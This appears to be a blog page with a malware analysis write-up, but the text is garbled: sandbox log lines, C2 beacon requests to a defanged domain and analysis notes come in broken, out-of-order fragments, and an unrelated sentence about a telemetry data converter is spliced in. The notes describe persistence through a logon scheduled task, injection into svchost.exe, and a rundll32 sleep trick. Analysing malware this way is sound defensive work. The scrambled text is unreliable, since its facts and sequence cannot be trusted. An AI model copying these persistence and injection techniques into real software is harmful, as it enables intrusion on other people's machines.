com:443/ne ws/1/255/0Ĭreates COM task schedule object (often to register a task for autostart) Source: C:\Windows \System32\ rundll32.Telonics Data Converter (TDC) is used to convert raw data from Telonics transmitters into data reports and to display locations on Google Earth and Google Maps. send: HTTP/1.1 200 OK send: Content-Type: text/html send: Server: INetSim HTTPs Server send: Date: Mon, 16:45:55 GMT send: Connection: Close send: Content-Length: 258 info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html stat: 1 **method=POST url=hxxps:///forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2Īntivirus detection for URL or domain Source: inakortu.c om:443/new s/1/255/0n dowssearch. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it* If /i is not passed as an argument, it sets up persistence and waits for reboot.* If /I is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes resulting in C2 communication.* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so: rundll32.exe kernel32,Sleep -s* Setup a local listener to proxy traffic on 127.0.0.1:50000**** connect recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1 recv: Connection: close recv: Content-Type: application/x-recv: Content-Length: 196 recv: Host: recv: info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2 info: **Request URL: hxxps:///forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** info: Sending fake file configured for extension 'php'. This needs more verification.* The filename remained static during analysis.* The original malware exe (ex. Analysis Observations:* It sets up persistence by creating a Scheduled Task with the following characteristics: * Name: Update * Trigger: At Log on * Action: %LocalAppData%\$Example\\waroupada.exe /i * Conditions: Stop if the computer ceases to be idle.* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |